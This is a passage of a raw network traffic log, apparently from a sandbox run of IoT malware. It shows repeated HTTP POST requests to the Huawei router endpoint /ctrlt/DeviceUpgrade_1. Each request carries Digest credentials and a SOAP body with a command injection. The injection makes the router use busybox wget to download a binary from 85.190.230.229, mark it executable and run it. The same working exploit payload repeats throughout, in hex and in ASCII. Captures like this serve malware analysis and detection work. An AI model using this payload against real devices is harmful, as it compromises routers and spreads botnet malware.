                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362133026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425842047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361490965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976855993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951658964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      50192.168.2.143884041.114.77.9837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.603668928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.934195042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418087006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410038948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362134933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425862074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
